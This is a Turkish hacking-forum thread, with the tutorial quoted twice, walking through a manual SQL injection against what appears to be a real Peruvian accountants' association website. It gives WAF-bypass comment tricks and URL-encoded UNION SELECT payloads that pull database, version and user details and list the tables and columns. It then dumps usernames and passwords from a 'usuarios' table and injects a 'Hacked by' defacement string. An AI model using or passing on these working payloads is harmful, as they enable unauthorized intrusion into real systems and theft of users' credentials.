Manuel SQL İnjection, Waff bypass denemesi #1

Cyberdown

Üye
21 Haz 2020
154
5
Merhaba,

Kodları kopyala yapıştır yaptığımda çalışıyor. Teşekkür ederim. fakat ->>


6uiSav.png

Sql kodlarının örneğin rütbe sitemini veya diğer " grup_contact " kodlarını nasıl biliyorsunuz nerede ne olacağını?

Hocam iyi güzel anlatıyorsunuz. Fakat sql baypass yapabilmemiz için ilk başta sql kodlamayı bilmemiz gerekmez miydi?

nedeni ise mesela siz bir örnek verdiniz güzel fakat biz sizin verdiğiniz örneğin ilerisine gitmek istersek ne yapacağız?


-Saygılarımla.
*Sağlıcakla Kalın.
 
Son düzenleme:

PresanS

Kıdemli Üye
8 Ocak 2017
2,470
203
24
Debian
Ellerine sağlık ancak bazı kodlar görülmemiş. Onları şöyle düzeltebilirsiniz daha güzel olurlar. :)

[KOD]

ATMACA[/KOD]

KOD = CODE, sonuç:

Kod:
Atmaca


Çok teşekkür ederim ama [kod] deneme[/kod]
Yaptığım da olmadı code li şekilde zaten bu





Merhaba,

Kodları kopyala yapıştır yaptığımda çalışıyor. Teşekkür ederim. fakat ->>


6uiSav.png

Sql kodlarının örneğin rütbe sitemini veya diğer " grup_contact " kodlarını nasıl biliyorsunuz nerede ne olacağını?

Hocam iyi güzel anlatıyorsunuz. Fakat sql baypass yapabilmemiz için ilk başta sql kodlamayı bilmemiz gerekmez miydi?

nedeni ise mesela siz bir örnek verdiniz güzel fakat biz sizin verdiğiniz örneğin ilerisine gitmek istersek ne yapacağız?


-Saygılarımla.
*Sağlıcakla Kalın.



Merhaba temel olarak hep aynı işlevleri yapıyoruz sadece aralara bypass ekliyoruz. SQL dilini bende tam anlamıyla bilmiyorum. Hatta basit düzeyde de diyebilirim. Sadece inject. De en temelinden öğrendim ve kendime göre şekillendirmeye başladım.
 
Son düzenleme:

sehrbaz

Yeni üye
16 Eki 2020
41
3
localhost
Öncelikle Herkese Selamun Aleyküm Arkadaşlar



Manuel Sql İnjection konusunda tecrübe kazanabileceğimiz,basitten zora doğru giden waff ile uğraştıran siteleri ele alacağım... Her 1 site yeni bir bilgi yeni bir tecrübe demektir.

Örnek SQL İnjection içeren web sitemiz ;
MdYz7.png



Error Based hata çıktısı aldığımız zaman bilinki group by kullanarak kısa yol ile kolon sayımızı öğrenebiliriz :)
Evet burda 14 de hata verdiğini söylüyor, yani kolon sayımız 13 demek .


MdoDa.png


Şimdi herkesin bildiği üzere sıra geldi zaafiyetli kolonlarımızı yazdırmaya :) hangi bypassı kullanırsanız kullanın örnek olarak ;
1- /*!12345STRİNG */
2- /*!50000STRİNG */
3- /*!13337 STRİNG*/
4- STRİNG/**_**/
5- /*!50000STRİNG /**_**/ */
Veya Web sitesi boşluğu ya da + yı wafflamıştır onun için ise url encode yani = %0A



MyHkY.png


dostlar waffı bu şekilde geçemedim, Union daki "U" yu, Select'deki "S" yi url encode ettim ve sayıları yazdırabildim.
Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--+-


Myb5M.png



Database,versiyon ve user bilgisini de çektik.
Group_concat'ı kullanırken yine baş harflerini url encode etmemiz gerekiyor,çünkü aynı waff onlarda da var.



Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,%47roup_%43oncat('<font color="red" size="5px">','Hacked by PresanS','<br>','<img src=https://i.hizliresim.com/DPrBm6.gif>','<br>','database_name=%0A',database(),'<br>','user=%0A',user(),'<br>','version=%0A',version(),'<br>'),8,9,10,11,12,13--+-

M1byu.png


sıra da tabloları çekmek var, bildiğimiz işlemleri uyguluyorum.


Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(table_name,'<br>'),10,11,12,13+from+information_schema.tables+where+table_schema=database()--+-


N7HXaG.png



evet dikkatimizi çekmesi gereken 2 tablo var burda ; intranetusuarios,usuarios tabloları.
Ben usuarios tablosunun kolonlarını çekeceğim.




Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(column_name,'<br>'),10,11,12,13+from+information_schema.columns+where+table_name=0x7573756172696f73--+-


M1AyL.png


Evet kolonlarımızı da çektik sıra geldi dump etmeye, her zamanki yoldan gittim ama bir sıkıntı ile karşılaştım.


Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(usuario,pass,'<br>'),10,11,12,13+from+usuarios--+-


M1gjs.png





burada siz bildiğin dump yöntemlerini kullanabilirsiniz ben 3 tane denedim, sonuncusunda olumlu sonuç alabildim.




Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(/*!50000%53ELECT/**_**)*/(@x:=0x00),(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(usuarios)/*!50000WHERE/**_**/*/(@x)IN(@x:=/*!50000%43ONCAT/**_*/*/(0x20,@x,'Kullanıcı_adı=',0x3a,usuario,0x3c62723e,'password',0x3a,pass))))x),10,11,12,13--+-


M1JuB.png





Dostlarım sizlerden ricam şudur,konuya eline sağlık vb. şeyler yazmak yerine size katkı sağladı mı? bilmediğiniz bir şeyi öğrendiniz mi? yine söylüyorum 1 site 1 tecrübe demektir.


Elenize sağlık
 

Adanalıtrojan

Kıdemli Üye
25 Haz 2021
2,018
1,051
16
Konya Ovası Askeri Tesislerinde
Öncelikle Herkese Selamun Aleyküm Arkadaşlar



Manuel Sql İnjection konusunda tecrübe kazanabileceğimiz,basitten zora doğru giden waff ile uğraştıran siteleri ele alacağım... Her 1 site yeni bir bilgi yeni bir tecrübe demektir.

Örnek SQL İnjection içeren web sitemiz ;
MdYz7.png



Error Based hata çıktısı aldığımız zaman bilinki group by kullanarak kısa yol ile kolon sayımızı öğrenebiliriz :)
Evet burda 14 de hata verdiğini söylüyor, yani kolon sayımız 13 demek .


MdoDa.png


Şimdi herkesin bildiği üzere sıra geldi zaafiyetli kolonlarımızı yazdırmaya :) hangi bypassı kullanırsanız kullanın örnek olarak ;
1- /*!12345STRİNG */
2- /*!50000STRİNG */
3- /*!13337 STRİNG*/
4- STRİNG/**_**/
5- /*!50000STRİNG /**_**/ */
Veya Web sitesi boşluğu ya da + yı wafflamıştır onun için ise url encode yani = %0A



MyHkY.png


dostlar waffı bu şekilde geçemedim, Union daki "U" yu, Select'deki "S" yi url encode ettim ve sayıları yazdırabildim.
Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,9,10,11,12,13--+-


Myb5M.png



Database,versiyon ve user bilgisini de çektik.
Group_concat'ı kullanırken yine baş harflerini url encode etmemiz gerekiyor,çünkü aynı waff onlarda da var.



Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,%47roup_%43oncat('<font color="red" size="5px">','Hacked by PresanS','<br>','<img src=https://i.hizliresim.com/DPrBm6.gif>','<br>','database_name=%0A',database(),'<br>','user=%0A',user(),'<br>','version=%0A',version(),'<br>'),8,9,10,11,12,13--+-

M1byu.png


sıra da tabloları çekmek var, bildiğimiz işlemleri uyguluyorum.


Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(table_name,'<br>'),10,11,12,13+from+information_schema.tables+where+table_schema=database()--+-


N7HXaG.png



evet dikkatimizi çekmesi gereken 2 tablo var burda ; intranetusuarios,usuarios tabloları.
Ben usuarios tablosunun kolonlarını çekeceğim.




Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(column_name,'<br>'),10,11,12,13+from+information_schema.columns+where+table_name=0x7573756172696f73--+-


M1AyL.png


Evet kolonlarımızı da çektik sıra geldi dump etmeye, her zamanki yoldan gittim ama bir sıkıntı ile karşılaştım.


Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,%67roup_%63oncat(usuario,pass,'<br>'),10,11,12,13+from+usuarios--+-


M1gjs.png





burada siz bildiğin dump yöntemlerini kullanabilirsiniz ben 3 tane denedim, sonuncusunda olumlu sonuç alabildim.




Junta de Decanos de Colegios de Contadores Públicos del Perú' AND MOD(29,2) %55NION %53ELECT 1,2,3,4,5,6,7,8,(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(/*!50000%53ELECT/**_**)*/(@x:=0x00),(/*!50000%53ELECT/**_**/*/(@x)/*!50000FROM/**_**/*/(usuarios)/*!50000WHERE/**_**/*/(@x)IN(@x:=/*!50000%43ONCAT/**_*/*/(0x20,@x,'Kullanıcı_adı=',0x3a,usuario,0x3c62723e,'password',0x3a,pass))))x),10,11,12,13--+-


M1JuB.png





Dostlarım sizlerden ricam şudur,konuya eline sağlık vb. şeyler yazmak yerine size katkı sağladı mı? bilmediğiniz bir şeyi öğrendiniz mi? yine söylüyorum 1 site 1 tecrübe demektir.


Hocam bunu sitenin urlsinmi yapiyoruz yoksa terminaldan mı?
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.